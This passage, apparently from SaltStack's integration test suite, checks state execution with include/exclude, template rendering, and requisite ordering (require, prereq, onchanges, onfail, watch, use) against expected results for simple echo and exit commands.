shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
        Ensure these errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
        # undetected infinite loops prevent this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
                'changes': descr['changes'] != {}  # whether there were any changes
}
return result
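    # Hedged example of normalize_ret's effect (values illustrative): an entry
    #   {'cmd_|-A_|-echo A_|-run': {'__run_num__': 0,
    #    'comment': 'Command "echo A" run', 'result': True,
    #    'changes': {'pid': 123}, 'start_time': '...', 'duration': 1.5}}
    # collapses to
    #   {'cmd_|-A_|-echo A_|-run': {'__run_num__': 0,
    #    'comment': 'Command "echo A" run', 'result': True, 'changes': True}}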
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
        # And why prevent it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
        Call sls file containing several require_any requisites.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
        Call sls file containing several require_any requisites.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
        Call sls file containing several watch_any requisites.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
        Call sls file containing several watch_any requisites.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
        Call sls file containing several onchanges_any requisites.
        Ensure that only the right states run and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
        Call sls file containing several onfail_any requisites.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_all(self):
'''
Call sls file containing several onfail-all
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 0_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-exit 1_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-e_|-exit 1_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-f_|-exit 1_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-reqs also met_|-echo itonfailed_|-run': {
'__run_num__': 9,
'changes': True,
'comment': 'Command "echo itonfailed" run',
'result': True
},
'cmd_|-reqs also not met_|-echo italsodidnonfail_|-run': {
'__run_num__': 7,
'changes': False,
'comment':
'State was not run because onfail req did not change',
'result': True
},
'cmd_|-reqs met_|-echo itonfailed_|-run': {
'__run_num__': 8,
'changes': True,
'comment': 'Command "echo itonfailed" run',
'result': True
},
'cmd_|-reqs not met_|-echo itdidntonfail_|-run': {
'__run_num__': 6,
'changes': False,
'comment':
'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_all')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
        Test the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call an sls file containing several use_in and use requisites.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 resolution, these tests may become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call an sls file containing several use_in and use requisites.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
